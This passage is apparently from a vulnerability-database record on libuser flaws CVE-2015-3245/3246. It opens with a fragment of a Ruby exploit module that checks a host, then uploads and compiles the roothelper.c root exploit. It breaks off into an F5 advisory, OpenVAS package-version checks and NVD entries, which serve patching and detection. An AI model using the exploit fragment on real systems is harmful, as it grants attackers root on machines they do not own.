\nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef live_compile? \ncompile = false \n \nif datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \nif has_gcc? \nvprint_good 'gcc is installed' \ncompile = true \nelse \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \nend \n \ncompile \nend \n \ndef check \nuserhelper_path = '/usr/sbin/userhelper' \nunless setuid? userhelper_path \nvprint_error \"#{userhelper_path} is not setuid\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{userhelper_path} is setuid\" \n \nunless command_exists? 'script' \nvprint_error \"script is not installed. Exploitation will fail.\" \nreturn CheckCode::Safe \nend \nvprint_good 'script is installed' \n \nif cmd_exec('lsattr /etc/passwd').include? 'i' \nvprint_error 'File /etc/passwd is immutable' \nreturn CheckCode::Safe \nend \nvprint_good 'File /etc/passwd is not immutable' \n \nglibc_banner = cmd_exec 'ldd --version' \nglibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first \nif glibc_version.to_s.eql? '' \nvprint_error 'Could not determine the GNU C library version' \nreturn CheckCode::Detected \nend \n \n# roothelper.c requires functions only available since glibc 2.6+ \nif glibc_version < Gem::Version.new('2.6') \nvprint_error \"GNU C Library version #{glibc_version} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"GNU C Library version #{glibc_version} is supported\" \n \nCheckCode::Detected \nend \n \ndef exploit \nif check == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? 
\nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \n \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \n \n# Upload Qualys' roothelper.c exploit: \n# - https://www.exploit-db.com/exploits/37706/ \npath = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c' \nfd = ::File.open path, 'rb' \nc_code = fd.read fd.stat.size \nfd.close \nupload \"#{executable_path}.c\", c_code \noutput = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{executable_path}\" \nregister_file_for_cleanup executable_path \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' 
The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can limit administrative shell access to trusted users only.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-05-25T00:00:00", "published": "2015-12-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/05/sol05770600.html", "id": "SOL05770600", "title": "SOL05770600 - Linux libuser vulnerability CVE-2015-3246", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2015-0278", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130100", "title": "Mageia Linux Local Check: mgasa-2015-0278", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0278.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130100\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:42 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0278\");\n script_tag(name:\"insight\", value:\"Two flaws were found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root (CVE-2015-3245, CVE-2015-3246).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0278.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0278\");\n script_copyright(\"Eero 
Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.60~5.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1483", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123073", "title": "Oracle Linux Local Check: ELSA-2015-1483", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1483.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123073\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:00 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1483\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1483 - libuser security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1483\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1483.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libuser\", 
rpm:\"libuser~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:53", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1482", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123048", "title": "Oracle Linux Local Check: ELSA-2015-1482", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1482.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123048\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1482\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1482 - libuser security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1482\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1482.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libuser\", 
rpm:\"libuser~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310850683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850683", "title": "SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_1332_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850683\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:39:24 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libuser'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"libuser was updated to fix on security issue.\n\n The following vulnerability was fixed:\n\n * CVE-2015-3246: local root exploit through passwd file handling\n (boo#937533)\");\n script_tag(name:\"affected\", value:\"libuser on openSUSE 13.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1332_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-debuginfo\", rpm:\"libuser-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-debugsource\", rpm:\"libuser-debugsource~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-python-debuginfo\", rpm:\"libuser-python-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser1\", rpm:\"libuser1~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser1-debuginfo\", rpm:\"libuser1-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-lang\", rpm:\"libuser-lang~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", 
"published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120278", "title": "Amazon Linux Local Check: ALAS-2015-572", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-572.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120278\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:26 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-572\");\n script_tag(name:\"insight\", value:\"It was found that libuser, as used in the chfn userhelper functionality, does not properly filter out newline characters, which allows an authenticated local attacker to corrupt the /etc/passwd file and cause denial-of-service against the system. 
(CVE-2015-3245 )A flaw was found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root. (CVE-2015-3246 )\");\n script_tag(name:\"solution\", value:\"Run yum update usermode libuser to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-572.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"usermode\", rpm:\"usermode~1.102~3.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"usermode-debuginfo\", rpm:\"usermode-debuginfo~1.102~3.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = 
isrpmvuln(pkg:\"libuser-debuginfo\", rpm:\"libuser-debuginfo~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:14:41", "bulletinFamily": "NVD", "description": "libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the userhelper program in the usermode package, directly modifies /etc/passwd, which allows local users to cause a denial of service (inconsistent file state) by causing an error during the modification. NOTE: this issue can be combined with CVE-2015-3245 to gain privileges.", "modified": "2018-05-20T01:29:00", "id": "CVE-2015-3246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3246", "published": "2015-08-11T14:59:00", "title": "CVE-2015-3246", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:41", "bulletinFamily": "NVD", "description": "Incomplete blacklist vulnerability in the chfn function in libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the userhelper program in the usermode package, allows local users to cause a denial of service (/etc/passwd corruption) via a newline character in the GECOS field.", "modified": "2018-05-20T01:29:00", "id": "CVE-2015-3245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3245", "published": "2015-08-11T14:59:00", "title": "CVE-2015-3245", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}]}